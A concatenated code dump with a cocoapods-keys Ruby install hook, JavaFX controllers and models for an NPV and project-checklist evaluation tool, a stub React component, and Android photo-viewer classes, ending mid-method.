# Monkey-patches the CocoaPods installer so key generation runs before
# `pod install` whenever the Podfile declares the "cocoapods-keys" plugin.
module Pod
  class Installer

    # Keep a handle on the stock implementation before overriding it.
    alias_method :install_before_cocoapods_keys!, :install!

    # Generate the Keys pod (if the plugin is enabled), then run the
    # original installation.
    def install!
      CocoaPodsKeys.setup if validates_for_keys
      install_before_cocoapods_keys!
    end

    # True when the Podfile opts in to the cocoapods-keys plugin.
    def validates_for_keys
      Pod::Config.instance.podfile.plugins["cocoapods-keys"] != nil
    end
  end
end
| e3bd5bd2abb93ea67fa3c4c55d39051015b36621 | [
"Ruby"
] | 1 | Ruby | kArTeL/cocoapods-keys | 9b2c16d1f3a7e2335bb0bc1a8bdc26e39f73473a | b1de67a1d47bcecdbe0614f9cf770b74f145c911 |
refs/heads/master | <repo_name>martinrzg/Project_Portfolio_Evaluation_Tool<file_sep>/src/models/NPVRow.java
package models;
import com.jfoenix.controls.datamodels.treetable.RecursiveTreeObject;
import javafx.beans.property.SimpleDoubleProperty;
import javafx.beans.property.SimpleIntegerProperty;
/**
* Created by <NAME> on 4/22/2017.
*/
/**
 * One row of the Net-Present-Value table. Each cell is backed by a JavaFX
 * property so the tree-table columns can bind to and observe the values.
 */
public class NPVRow extends RecursiveTreeObject<NPVRow> {

    SimpleIntegerProperty period;
    SimpleDoubleProperty outflow;
    SimpleDoubleProperty inflow;
    SimpleDoubleProperty netCashFlow;
    SimpleDoubleProperty netPresentValue;
    SimpleDoubleProperty cumulativeNPV;

    /** Wraps the raw figures for one period into observable properties. */
    public NPVRow(int periodIndex, double cashOut, double cashIn,
                  double net, double presentValue, double runningNPV) {
        this.period = new SimpleIntegerProperty(periodIndex);
        this.outflow = new SimpleDoubleProperty(cashOut);
        this.inflow = new SimpleDoubleProperty(cashIn);
        this.netCashFlow = new SimpleDoubleProperty(net);
        this.netPresentValue = new SimpleDoubleProperty(presentValue);
        this.cumulativeNPV = new SimpleDoubleProperty(runningNPV);
    }

    // --- period -----------------------------------------------------------
    public int getPeriod() { return this.period.get(); }
    public void setPeriod(int period) { this.period.set(period); }
    public SimpleIntegerProperty periodProperty() { return this.period; }

    // --- outflow ----------------------------------------------------------
    public double getOutflow() { return this.outflow.get(); }
    public void setOutflow(double outflow) { this.outflow.set(outflow); }
    public SimpleDoubleProperty outflowProperty() { return this.outflow; }

    // --- inflow -----------------------------------------------------------
    public double getInflow() { return this.inflow.get(); }
    public void setInflow(double inflow) { this.inflow.set(inflow); }
    public SimpleDoubleProperty inflowProperty() { return this.inflow; }

    // --- net cash flow ----------------------------------------------------
    public double getNetCashFlow() { return this.netCashFlow.get(); }
    public void setNetCashFlow(double netCashFlow) { this.netCashFlow.set(netCashFlow); }
    public SimpleDoubleProperty netCashFlowProperty() { return this.netCashFlow; }

    // --- net present value ------------------------------------------------
    public double getNetPresentValue() { return this.netPresentValue.get(); }
    public void setNetPresentValue(double netPresentValue) { this.netPresentValue.set(netPresentValue); }
    public SimpleDoubleProperty netPresentValueProperty() { return this.netPresentValue; }

    // --- cumulative NPV ---------------------------------------------------
    public double getCumulativeNPV() { return this.cumulativeNPV.get(); }
    public void setCumulativeNPV(double cumulativeNPV) { this.cumulativeNPV.set(cumulativeNPV); }
    public SimpleDoubleProperty cumulativeNPVProperty() { return this.cumulativeNPV; }
}
<file_sep>/src/utils/Utils.java
package utils;
import com.sun.org.apache.xpath.internal.operations.String;
import javafx.scene.image.Image;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
/**
* Created by <NAME> on 4/14/2017.
*/
/**
 * Shared UI helpers: per-tab tooltip texts and common icons.
 */
public class Utils {

    /** Tooltip text for each evaluation tab, in tab order. */
    public static java.lang.String[] tabMessages = {"Search when does the project will start obtaining revenues","The value of a project including the investment rate and taxes", "Criteria filter for the viability of a project", "Big picture of the depreciation of items","Detailed filter for project viability evaluation"};

    /**
     * Loads the error icon from the resources folder.
     *
     * @return the icon, or {@code null} if the file is missing
     *         (callers must handle the null)
     */
    public static Image geErrorIcon(){
        try {
            // Fix: forward slashes work on every platform in Java paths;
            // the original escaped backslashes were Windows-only.
            Image iconError = new Image(new FileInputStream("resources/icons/ic_error_black_24dp_1x.png"));
            return iconError;
        } catch (FileNotFoundException e) {
            e.printStackTrace();
        }
        return null;
    }
}
<file_sep>/src/Main.java
import controllers.Home;
import controllers.Welcome;
import javafx.application.Application;
import javafx.collections.ObservableList;
import javafx.stage.Stage;
import java.awt.*;
import java.io.File;
/**
 * JavaFX entry point for the Project Portfolio Evaluation Tool.
 * Delegates scene construction to the Welcome controller.
 */
public class Main extends Application {

    @Override
    public void start(Stage primaryStage) throws Exception {
        // The Welcome controller builds and shows the first scene itself
        // (title, size and resizability are configured there).
        // Removed the dead commented-out FXML bootstrap code.
        new Welcome().launchWelcomeScene(primaryStage);
    }

    public static void main(String[] args) {
        launch(args);
    }
}
<file_sep>/src/models/ChecklistRow.java
package models;
import com.jfoenix.controls.datamodels.treetable.RecursiveTreeObject;
import javafx.beans.property.SimpleStringProperty;
/**
* Created by <NAME> on 4/25/2017.
*/
/**
 * One row of the project-evaluation checklist table: a topic, its
 * question, and the user's editable answer, each backed by a JavaFX
 * string property for table binding.
 */
public class ChecklistRow extends RecursiveTreeObject<ChecklistRow>{

    SimpleStringProperty topic;
    SimpleStringProperty question;
    SimpleStringProperty answer;

    /** Wraps the three cell values into observable properties. */
    public ChecklistRow(String topicText, String questionText, String answerText){
        this.topic = new SimpleStringProperty(topicText);
        this.question = new SimpleStringProperty(questionText);
        this.answer = new SimpleStringProperty(answerText);
    }

    // --- topic ------------------------------------------------------------
    public String getTopic() { return this.topic.get(); }
    public void setTopic(String topic) { this.topic.set(topic); }
    public SimpleStringProperty topicProperty() { return this.topic; }

    // --- question ---------------------------------------------------------
    public String getQuestion() { return this.question.get(); }
    public void setQuestion(String question) { this.question.set(question); }
    public SimpleStringProperty questionProperty() { return this.question; }

    // --- answer (edited in-place by the table cell) -----------------------
    public String getAnswer() { return this.answer.get(); }
    public void setAnswer(String answer) { this.answer.set(answer); }
    public SimpleStringProperty answerProperty() { return this.answer; }
}
<file_sep>/src/controllers/Checklist.java
package controllers;
import com.itextpdf.text.DocumentException;
import com.jfoenix.controls.*;
import com.jfoenix.controls.cells.editors.TextFieldEditorBuilder;
import com.jfoenix.controls.cells.editors.base.GenericEditableTreeTableCell;
import com.jfoenix.controls.datamodels.treetable.RecursiveTreeObject;
import javafx.beans.value.ChangeListener;
import javafx.beans.value.ObservableValue;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.event.EventHandler;
import javafx.fxml.FXML;
import javafx.fxml.Initializable;
import javafx.scene.control.Label;
import javafx.scene.control.TreeTableColumn;
import javafx.scene.control.cell.ComboBoxTableCell;
import javafx.scene.input.MouseEvent;
import javafx.scene.layout.AnchorPane;
import javafx.util.converter.DefaultStringConverter;
import models.ChecklistRow;
import utils.PDFMaker;
import java.io.IOException;
import java.net.URL;
import java.util.ResourceBundle;
import java.util.function.Function;
/**
* Created by <NAME> on 4/25/2017.
*/
/**
 * Controller for the Checklist tab: an editable tree-table of evaluation
 * questions (topic / question / answer) with live search and PDF export.
 */
public class Checklist implements Initializable {

    // FXML-injected controls; fields are populated by the FXMLLoader.
    @FXML private JFXTextField searchField;
    @FXML private AnchorPane root;
    @FXML private Label treeTableViewCount;
    @FXML private JFXTreeTableView<ChecklistRow> treeTableView;
    @FXML private JFXTreeTableColumn<ChecklistRow, String> questionColumn;
    @FXML private JFXTreeTableColumn<ChecklistRow, String> topicColumn;
    @FXML private JFXTreeTableColumn<ChecklistRow, String> answerColumn;
    @FXML private JFXButton buttonSavePDF;

    // Backing model for the table rows.
    private ObservableList<ChecklistRow> data;

    /**
     * Seeds the question list, wires the table, and hooks up PDF export.
     */
    @Override
    public void initialize(URL location, ResourceBundle resources) {
        data = FXCollections.observableArrayList();
        getTableData();
        setupTable();
        buttonSavePDF.setOnMouseClicked(new EventHandler<MouseEvent>() {
            @Override
            public void handle(MouseEvent event) {
                try {
                    //getChartImage();
                    PDFMaker.makePDFChecklist("Checklist", data);
                    //TODO Popup sucess save file!
                } catch (DocumentException e) {
                    e.printStackTrace();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        });
    }

    // Binds a column to one row property, honoring JFoenix's grouped-row
    // validation (falls back to the computed value for group rows).
    private <T> void setupCellValueFactory(JFXTreeTableColumn<ChecklistRow, T> column, Function<ChecklistRow, ObservableValue<T>> mapper) {
        column.setCellValueFactory((TreeTableColumn.CellDataFeatures<ChecklistRow, T> param) -> {
            if (column.validateValue(param)) {
                return mapper.apply(param.getValue().getValue());
            } else {
                return column.getComputedValue(param);
            }
        });
    }

    // Wires columns to properties, makes the answer column editable
    // in-place, and attaches the live search filter.
    private void setupTable() {
        setupCellValueFactory(topicColumn , ChecklistRow::topicProperty);
        setupCellValueFactory(questionColumn, ChecklistRow::questionProperty);
        setupCellValueFactory(answerColumn ,ChecklistRow::answerProperty);
        answerColumn.setCellFactory((TreeTableColumn<ChecklistRow, String> param) -> {
            return new GenericEditableTreeTableCell<>(
                    new TextFieldEditorBuilder());
        });
        // Commit the edited text back into the row's answer property.
        answerColumn.setOnEditCommit((TreeTableColumn.CellEditEvent<ChecklistRow, String> t) -> {
            t.getTreeTableView().getTreeItem(t.getTreeTablePosition().getRow()).getValue().answerProperty().set(t.getNewValue());
        });
        treeTableView.setRoot(new RecursiveTreeItem<ChecklistRow>(data, RecursiveTreeObject::getChildren));
        treeTableView.setShowRoot(false);
        treeTableView.setEditable(true);
        searchField.textProperty().addListener(setupSearchField(treeTableView));
    }

    // Returns a listener that filters rows to those containing the search
    // text in any of the three columns (case-sensitive substring match).
    private ChangeListener<String> setupSearchField(final JFXTreeTableView<ChecklistRow> tableView) {
        return (o, oldVal, newVal) ->
                tableView.setPredicate(paybackProp -> {
                    final ChecklistRow temp = paybackProp.getValue();
                    return temp.getTopic().contains(newVal)
                            || temp.getQuestion().contains(newVal)
                            || temp.getAnswer().contains(newVal);
                });
    }

    // Seeds the 20 fixed checklist questions; answers start empty.
    private void getTableData() {
        for (int i = 0; i < 20; i++) {
            data.add(new ChecklistRow("","",""));
        }
        data.get(0).setTopic("Strategy/alignment");
        data.get(0).setQuestion("What specific organization strategy does this project align with?");
        data.get(1).setTopic("Driver");
        data.get(1).setQuestion("What business problem does the project solve?");
        data.get(2).setTopic("Success metrics");
        data.get(2).setQuestion("How will measure success?");
        data.get(3).setTopic("Sponsorship");
        data.get(3).setQuestion("Who is the project sponsor?");
        data.get(4).setTopic("Risk");
        data.get(4).setQuestion("What is the impact of not doing this project?");
        data.get(5).setTopic("Risk");
        data.get(5).setQuestion("What is the project risk to our organization?");
        data.get(6).setTopic("Risk");
        data.get(6).setQuestion("Where does the proposed project fit in our risk profile?");
        data.get(7).setTopic("Benefits, value ");
        data.get(7).setQuestion("What is the value of the project organization?");
        data.get(8).setTopic("Benefits, value");
        data.get(8).setQuestion("When will the project shows result?");
        data.get(9).setTopic("Objectives");
        data.get(9).setQuestion("What are the project objectives?");
        data.get(10).setTopic("Organization Culture");
        data.get(10).setQuestion("Is our organization culture right for this type of project?");
        data.get(11).setTopic("Resources");
        data.get(11).setQuestion("Will internal resources be available for this project?");
        data.get(12).setTopic("Approach");
        data.get(12).setQuestion("Will we build or buy?");
        data.get(13).setTopic("Schedule");
        data.get(13).setQuestion("How long will this project take?");
        data.get(14).setTopic("Schedule");
        data.get(14).setQuestion("Is the timeline realistic?");
        data.get(15).setTopic("Training/resources");
        data.get(15).setQuestion("Will staff training be required?");
        data.get(16).setTopic("Finance/portfolio");
        data.get(16).setQuestion("What is the estimated cost of the project?");
        data.get(17).setTopic("Portfolio");
        data.get(17).setQuestion("Is this a new initiative or path of an existing initiative?");
        data.get(18).setTopic("Portfolio");
        data.get(18).setQuestion("How does this project interact with current projects?");
        data.get(19).setTopic("Technology");
        data.get(19).setQuestion("Is the technology available or new?");
    }
}
<file_sep>/src/controllers/NPV.java
package controllers;
import com.itextpdf.text.DocumentException;
import com.jfoenix.controls.*;
import com.jfoenix.controls.cells.editors.DoubleTextFieldEditorBuilder;
import com.jfoenix.controls.cells.editors.base.GenericEditableTreeTableCell;
import com.jfoenix.controls.datamodels.treetable.RecursiveTreeObject;
import com.jfoenix.validation.NumberValidator;
import javafx.beans.binding.Bindings;
import javafx.beans.property.IntegerProperty;
import javafx.beans.value.ChangeListener;
import javafx.beans.value.ObservableValue;
import javafx.collections.FXCollections;
import javafx.collections.ObservableList;
import javafx.embed.swing.SwingFXUtils;
import javafx.event.EventHandler;
import javafx.fxml.FXML;
import javafx.fxml.Initializable;
import javafx.scene.Node;
import javafx.scene.SnapshotParameters;
import javafx.scene.chart.BarChart;
import javafx.scene.chart.XYChart;
import javafx.scene.control.Label;
import javafx.scene.control.TreeTableColumn;
import javafx.scene.image.ImageView;
import javafx.scene.image.WritableImage;
import javafx.scene.input.MouseEvent;
import javafx.scene.layout.AnchorPane;
import models.NPVRow;
import models.PaybackRow;
import operations.Projection;
import utils.PDFMaker;
import utils.Utils;
import javax.imageio.ImageIO;
import java.io.File;
import java.io.IOException;
import java.net.URL;
import java.util.ResourceBundle;
import java.util.function.Function;
/**
* Created by <NAME> on 4/19/2017.
*/
public class NPV implements Initializable {
@FXML private JFXComboBox<Integer> comboBoxPeriods;
@FXML private AnchorPane root;
@FXML private JFXTextField textFieldInterestRate;
@FXML private JFXTextField textFieldTaxRate;
@FXML private JFXButton treeTableViewAdd;
@FXML private JFXTextField searchField;
@FXML private BarChart<String , Number> barChart;
@FXML private JFXTreeTableView<NPVRow> treeTableView;
@FXML private JFXTreeTableColumn<NPVRow, Integer> periodColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> outflowColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> inflowColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> netCashFlowColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> NPVColumn;
@FXML private JFXTreeTableColumn<NPVRow, Double> cumulativeNVPColumn;
@FXML private JFXTextField textFieldResult;
@FXML private Label treeTableViewCount;
@FXML private JFXButton treeTableViewRemove;
@FXML private JFXButton buttonClear;
@FXML private JFXButton buttonSavePDF;
private static final String PREFIX = "( ";
private static final String POSTFIX = " )";
private ObservableList<NPVRow> data;
private void getChartImage(){
WritableImage image = barChart.snapshot(new SnapshotParameters(),null);
File file = new File("NPVChart.png");
try {
ImageIO.write(SwingFXUtils.fromFXImage(image, null), "png", file);
} catch (IOException e) {
// TODO: handle exception here
}
}
    /**
     * Seeds the table with a zero row, wires table/combo/validators/chart,
     * and hooks the PDF-export and clear buttons.
     */
    @Override
    public void initialize(URL location, ResourceBundle resources) {
        data = FXCollections.observableArrayList();
        data.add(new NPVRow(0,0,0,0,0,0));
        setupTable();
        setupComboBox();
        setupValidator();
        setUpBarChart();
        // Export: snapshot the chart to disk, then build the PDF from the
        // current inputs and the final cumulative NPV.
        buttonSavePDF.setOnMouseClicked(new EventHandler<MouseEvent>() {
            @Override
            public void handle(MouseEvent event) {
                try {
                    getChartImage();
                    PDFMaker.makePDFNPV("Net Present Value",getInterestRate(),data.size(),getTaxRate(),
                            data.get(data.size()-1).getCumulativeNPV(), data);
                    //TODO Popup sucess save file!
                } catch (DocumentException e) {
                    e.printStackTrace();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        });
        // Clear: empty the model and refresh the visible row counter.
        buttonClear.setOnMouseClicked(e->{
            data.clear();
            final IntegerProperty currCountProp = treeTableView.currentItemsCountProperty();
            currCountProp.set(data.size());
        });
    }
    /**
     * Parses the interest-rate text field.
     *
     * @return the entered rate, or 0 when the field is empty or not a
     *         valid number (the parse error is printed to stdout)
     */
    private double getInterestRate(){
        if(textFieldInterestRate.getText()!= null && !textFieldInterestRate.getText().isEmpty()){
            try{
                double interestRate = Double.parseDouble(textFieldInterestRate.getText());
                return interestRate;
            }catch (Exception e){
                System.out.println("ERROR "+e);
                return 0;
            }
        }
        return 0;
    }
private double getTaxRate(){
if(textFieldInterestRate.getText()!= null && !textFieldInterestRate.getText().isEmpty()){
try{
double taxRate = Double.parseDouble(textFieldTaxRate.getText());
return taxRate;
}catch (Exception e){
return 0;
}
}
return 0;
}
private void setUpBarChart() {
barChart.getXAxis().setLabel("Period");
barChart.getXAxis().setLabel("USD");
barChart.setData(getChartData());
}
    /**
     * Builds one "Cash Flow" series from the table rows: X = period,
     * Y = net cash flow. Each bar is colored when its node is created:
     * green for non-negative values, red for negative ones.
     */
    private ObservableList<XYChart.Series<String, Number>> getChartData(){
        ObservableList<XYChart.Series<String, Number>> newData = FXCollections.observableArrayList();
        XYChart.Series<String, Number> series = new XYChart.Series<>();
        series.setName("Cash Flow");
        for (int i = 0; i < data.size(); i++) {
            NPVRow temp = data.get(i);
            final XYChart.Data<String, Number> dataForSerie = new XYChart.Data<>(Integer.toString(temp.periodProperty().intValue()),temp.netCashFlowProperty().doubleValue());
            // The bar's Node only exists after the chart renders it, so the
            // style must be applied from this listener, not immediately.
            dataForSerie.nodeProperty().addListener(new ChangeListener<Node>() {
                @Override
                public void changed(ObservableValue<? extends Node> observable, Node oldValue, Node newNode) {
                    if (newNode != null) {
                        if (dataForSerie.getYValue().intValue() >= 0 ) {
                            newNode.setStyle("-fx-bar-fill: #00C853;");
                        } else {
                            newNode.setStyle("-fx-bar-fill: #F44336;");
                        }
                    }
                }
            });
            series.getData().add(dataForSerie);
            //series.getData().add(new XYChart.Data(Integer.toString(temp.periodProperty().intValue()), temp.netCashFlowProperty().doubleValue()));
        }
        newData.addAll(series);
        return newData;
    }
/**
 * Shows the latest cumulative NPV in the result field and redraws the chart.
 * Assumes {@code data} is non-empty (callers repopulate it first).
 */
private void updateBarChart() {
    final NPVRow lastRow = data.get(data.size() - 1);
    textFieldResult.setText(String.valueOf(lastRow.getCumulativeNPV()));
    barChart.setData(getChartData());
}
/**
 * Attaches numeric validators to the interest-rate and tax-rate fields and
 * triggers validation whenever either field loses focus.
 */
private void setupValidator() {
    NumberValidator rateValidator = new NumberValidator();
    NumberValidator taxValidator = new NumberValidator();
    textFieldInterestRate.getValidators().add(rateValidator);
    textFieldTaxRate.getValidators().add(taxValidator);
    rateValidator.setMessage("Numeric value 0-100%");
    taxValidator.setMessage("Numeric value 0-100%");
    rateValidator.setIcon(new ImageView(Utils.geErrorIcon()));
    taxValidator.setIcon(new ImageView(Utils.geErrorIcon()));
    // Validate on focus loss (isFocused == false), matching the lambda style
    // used elsewhere in this controller.
    textFieldTaxRate.focusedProperty().addListener((obs, wasFocused, isFocused) -> {
        if (!isFocused) {
            textFieldTaxRate.validate();
        }
    });
    textFieldInterestRate.focusedProperty().addListener((obs, wasFocused, isFocused) -> {
        if (!isFocused) {
            textFieldInterestRate.validate();
        }
    });
}
/**
 * Fills the period combo box with 1..100 and rebuilds the table rows
 * whenever a new period count is selected.
 */
private void setupComboBox() {
    for (int period = 1; period <= 100; period++) {
        comboBoxPeriods.getItems().add(period);
    }
    comboBoxPeriods.valueProperty().addListener(
            (observable, previous, selected) -> addPeriods(selected));
}
/** Dumps every row of the NPV table to stdout (debugging aid only). */
private void printData() {
    for (NPVRow row : data) {
        System.out.println("p:" + row.periodProperty().intValue()
                + " outf: " + row.outflowProperty().doubleValue()
                + " in: " + row.inflowProperty().doubleValue()
                + " ncf:" + row.netCashFlowProperty().doubleValue()
                + " npv:" + row.netPresentValueProperty().doubleValue()
                + " Cnpv " + row.cumulativeNPVProperty().doubleValue());
    }
}
/**
 * Replaces the table contents with fresh zeroed rows, then refreshes the
 * chart and the visible row counter.
 * NOTE(review): the '<=' bound creates numPeriods + 1 rows (periods
 * 0..numPeriods) — presumably row 0 is the initial-investment period;
 * confirm against Projection.calculateNPV.
 */
private void addPeriods(int numPeriods) {
data.clear();
for (int i = 0; i <= numPeriods; i++) {
// getDataIndex() numbers rows sequentially from 0 as they are added.
data.add(new NPVRow( getDataIndex(),0,0,0,0,0) );
}
updateBarChart();
final IntegerProperty currCountProp = treeTableView.currentItemsCountProperty();
currCountProp.set(data.size());
}
/**
 * Wires the tree-table: column value factories, editable outflow/inflow
 * cells that recompute the NPV series on commit, add/remove row buttons,
 * the row-count label binding, and the search-field filter.
 */
private void setupTable() {
// Map each column to the corresponding NPVRow property.
setupCellValueFactory(periodColumn,p->p.periodProperty().asObject());
setupCellValueFactory(outflowColumn,p->p.outflowProperty().asObject());
setupCellValueFactory(inflowColumn,p->p.inflowProperty().asObject());
setupCellValueFactory(netCashFlowColumn,p->p.netCashFlowProperty().asObject());
setupCellValueFactory(NPVColumn,p->p.netPresentValueProperty().asObject());
setupCellValueFactory(cumulativeNVPColumn,p->p.cumulativeNPVProperty().asObject());
// Outflow is user-editable via a numeric text-field cell.
outflowColumn.setCellFactory((TreeTableColumn<NPVRow, Double> param) -> {
return new GenericEditableTreeTableCell<>(
new DoubleTextFieldEditorBuilder());
});
// On commit: write the value back to the row, recompute the whole NPV
// series with the current rates, and redraw the chart.
outflowColumn.setOnEditCommit((TreeTableColumn.CellEditEvent<NPVRow, Double> t) -> {
t.getTreeTableView().getTreeItem(t.getTreeTablePosition().getRow()).getValue().outflowProperty().set(t.getNewValue());
data = Projection.calculateNPV(data,getInterestRate(),getTaxRate());
updateBarChart();
//printData();
});
// Inflow column mirrors the outflow column's editing behavior.
inflowColumn.setCellFactory((TreeTableColumn<NPVRow, Double> param) -> {
return new GenericEditableTreeTableCell<>(
new DoubleTextFieldEditorBuilder());
});
inflowColumn.setOnEditCommit((TreeTableColumn.CellEditEvent<NPVRow, Double> t) -> {
t.getTreeTableView().getTreeItem(t.getTreeTablePosition().getRow()).getValue().inflowProperty().set(t.getNewValue());
//data = Projection.calculatePayback(data,Double.parseDouble(textFieldPrincipal.getText()),Double.parseDouble(textFieldInterestRate.getText()));
data = Projection.calculateNPV(data,getInterestRate(),getTaxRate());
updateBarChart();
//printData();
});
// "+" button: append a zeroed row with the next period number.
treeTableViewAdd.setOnMouseClicked((e) -> {
data.add(new NPVRow(getDataIndex(),0,0,0,0,0));
updateBarChart();
final IntegerProperty currCountProp = treeTableView.currentItemsCountProperty();
currCountProp.set(currCountProp.get() + 1);
//TODO make get textfield methods to make validation
//data = Projection.calculatePayback(data,Double.parseDouble(textFieldPrincipal.getText()),Double.parseDouble(textFieldInterestRate.getText()));
});
// "-" button: delete the selected row, renumber periods, refresh.
// NOTE(review): throws NPE when no row is selected — confirm intended.
treeTableViewRemove.setOnMouseClicked((e) -> {
data.remove(treeTableView.getSelectionModel().selectedItemProperty().get().getValue());
reCalculatePeriods();
updateBarChart();
final IntegerProperty currCountProp = treeTableView.currentItemsCountProperty();
currCountProp.set(currCountProp.get() - 1);
//TODO make get textfield methods to make validation
//data = Projection.calculatePayback(data,Double.parseDouble(textFieldPrincipal.getText()),Double.parseDouble(textFieldInterestRate.getText()));
});
treeTableView.setRoot(new RecursiveTreeItem<>(data, RecursiveTreeObject::getChildren));
treeTableView.setShowRoot(false);
treeTableView.setEditable(true);
// Live "PREFIX n POSTFIX" row counter bound to the table's item count.
treeTableViewCount.textProperty().bind(Bindings.createStringBinding(()->PREFIX + treeTableView.getCurrentItemsCount()
+ POSTFIX, treeTableView.currentItemsCountProperty()));
searchField.textProperty().addListener(setupSearchField(treeTableView));
}
/**
 * Builds the listener for the search field: a row stays visible when any of
 * its columns, rendered as a string, contains the typed text.
 *
 * Fix: the net-cash-flow check was duplicated, so the net-present-value
 * column was never searched; the duplicate now tests netPresentValueProperty.
 *
 * @param tableView the table whose row predicate is updated on each keystroke
 * @return a listener to attach to the search field's textProperty
 */
private ChangeListener<String> setupSearchField(final JFXTreeTableView<NPVRow> tableView) {
    return (o, oldVal, newVal) ->
            tableView.setPredicate(paybackProp -> {
                final NPVRow temp = paybackProp.getValue();
                return Integer.toString(temp.periodProperty().get()).contains(newVal)
                        || Double.toString(temp.outflowProperty().get()).contains(newVal)
                        || Double.toString(temp.inflowProperty().get()).contains(newVal)
                        || Double.toString(temp.netCashFlowProperty().get()).contains(newVal)
                        || Double.toString(temp.netPresentValueProperty().get()).contains(newVal)
                        || Double.toString(temp.cumulativeNPVProperty().get()).contains(newVal) ;
            });
}
/** Renumbers every row's period to its list position (used after a delete). */
private void reCalculatePeriods() {
    int index = 0;
    for (NPVRow row : data) {
        row.setPeriod(index++);
    }
}
/**
 * Period number for a newly appended row: 0 for an empty table,
 * otherwise the last row's period plus one.
 */
private int getDataIndex() {
    if (data.isEmpty()) {
        return 0;
    }
    return data.get(data.size() - 1).getPeriod() + 1;
}
/**
 * Wires a column to a row-property extractor. When the column reports the
 * cell parameters as valid, the mapped row property is used; otherwise the
 * JFoenix column supplies its own computed value (grouping/edit support).
 *
 * @param column the table column to configure
 * @param mapper extracts the observable cell value from a row
 */
private <T> void setupCellValueFactory(JFXTreeTableColumn<NPVRow, T> column, Function<NPVRow, ObservableValue<T>> mapper) {
column.setCellValueFactory((TreeTableColumn.CellDataFeatures<NPVRow, T> param) -> {
if (column.validateValue(param)) {
return mapper.apply(param.getValue().getValue());
} else {
return column.getComputedValue(param);
}
});
}
}
| 52e229a740b21a67c10590cb9371bb0771cb3a03 | [
"Java"
] | 6 | Java | martinrzg/Project_Portfolio_Evaluation_Tool | 4b2de3221a763cf6d1f2f3bdf5309079c654f6ef | bb6c2718b2401707ea480f2080f002c11847f379 |
refs/heads/master | <repo_name>n3rdgir1/trello_react_project<file_sep>/src/components.jsx
import React from 'react';
/* Define Card Component Here*/
/* Column Component */
class CardColumn extends React.Component {
render() {
return (<div><span>Hello</span></div>);
}
}
export default CardColumn;
| ca7a592d31ad57f3bca0bae660463889e6e8a562 | [
"JavaScript"
] | 1 | JavaScript | n3rdgir1/trello_react_project | f3e514e1029282210e4ac6c87d12de98685916ad | e91a9bf0ec978059cbf6d096c15e2ba8acfaef42 |
refs/heads/master | <repo_name>z0lope0z/pepemon<file_sep>/src/com/lopefied/pepemon/ViewPhotoActivity.java
package com.lopefied.pepemon;
import com.lopefied.pepemon.util.ImageLoader;
import com.lopefied.pepemon.widgets.TouchImageView;
import android.app.Activity;
import android.os.Bundle;
import android.util.Log;
import android.view.Window;
/**
*
* @author <NAME>
*
*/
public class ViewPhotoActivity extends Activity {
public static final String TAG = ViewPhotoActivity.class.getSimpleName();
// Intent-extra key: URL of the photo to display.
public static final String PHOTO_URL = "photo_url";
@Override
public void onCreate(Bundle savedInstanceState) {
// Full-screen photo view: hide the window title before inflating layout.
requestWindowFeature(Window.FEATURE_NO_TITLE);
super.onCreate(savedInstanceState);
setContentView(R.layout.view_photo);
init();
}
/**
 * Reads the photo URL from the launching intent and, when present, loads
 * the bitmap through the ImageLoader into a pinch-zoomable image view.
 * NOTE(review): ImageLoader.getBitmap may return null or block for an
 * uncached URL — confirm against ImageLoader's implementation.
 */
private void init() {
Bundle extras = getIntent().getExtras();
String photoURL = null;
if (extras != null) {
photoURL = extras.getString(PHOTO_URL);
Log.i(TAG, "Got albumID : " + photoURL);
if (photoURL != null) {
TouchImageView imageView = (TouchImageView) findViewById(R.id.imageView);
ImageLoader imageLoader = ImageLoader.getInstance(this);
imageView.setImageBitmap(imageLoader.getBitmap(photoURL));
// Allow up to 4x zoom on the displayed photo.
imageView.setMaxZoom(4f);
}
}
}
}
<file_sep>/src/com/lopefied/pepemon/provider/impl/AlbumPhotosProviderImpl.java
package com.lopefied.pepemon.provider.impl;
import java.util.List;
import android.app.ProgressDialog;
import android.util.Log;
import com.lopefied.pepemon.db.model.Album;
import com.lopefied.pepemon.db.model.Photo;
import com.lopefied.pepemon.provider.AlbumPhotosListener;
import com.lopefied.pepemon.provider.AlbumPhotosProvider;
import com.lopefied.pepemon.service.PhotoService;
import com.lopefied.pepemon.task.GetAlbumPhotosTask;
import com.lopefied.pepemon.task.GetAlbumPhotosTask.IAlbumPhotosDownloader;
/**
 * Supplies album photos to the UI, preferring the local cache and falling
 * back to a background Facebook download (GetAlbumPhotosTask) when the cache
 * is empty or exhausted.
 */
public class AlbumPhotosProviderImpl implements AlbumPhotosProvider {
public static final String TAG = AlbumPhotosProvider.class.getSimpleName();
// Page size for both cache queries and server requests.
public static final Integer LIMIT = 8;
private PhotoService photoService;
private ProgressDialog progressDialog;
private String accessToken;
// NOTE(review): never initialized; increasePageCount() would NPE if it were
// ever called (it currently is not).
private Integer pageCount;
// Tracks the most recent loadMore() download; see isDownloading().
private AlbumPhotosDownloader albumPhotosDownloader;
public AlbumPhotosProviderImpl(PhotoService photoService,
ProgressDialog progressDialog, String accessToken) {
this.photoService = photoService;
this.progressDialog = progressDialog;
this.accessToken = accessToken;
this.albumPhotosDownloader = new AlbumPhotosDownloader();
}
/**
 * Initial load: serve up to LIMIT cached photos, or start a server
 * download when the cache has none for this album.
 * NOTE(review): the downloader created here is a local instance, so
 * isDownloading() does not reflect downloads started from loadInit —
 * confirm whether that is intended.
 */
@Override
public void loadInit(AlbumPhotosListener albumPhotosListener, Album album) {
List<Photo> cacheList = photoService.getAlbumPhotos(album, LIMIT);
if (cacheList.size() > 0) {
albumPhotosListener.addNewPhotos(cacheList);
} else {
AlbumPhotosDownloader albumPhotosDownloader = new AlbumPhotosDownloader(
albumPhotosListener, progressDialog);
loadFromServer(albumPhotosListener, album, 0, albumPhotosDownloader);
}
}
/**
 * Next page: serve newer cached photos after lastPhoto when available;
 * otherwise (cache exhausted or empty) request more from the server.
 */
@Override
public void loadMore(final AlbumPhotosListener albumPhotosListener,
Photo lastPhoto, Album album, Integer totalItems) {
Photo lastPhotoCache = photoService.getLastPhoto(album);
albumPhotosDownloader = new AlbumPhotosDownloader(albumPhotosListener);
if (lastPhotoCache != null) {
if (lastPhoto == null) {
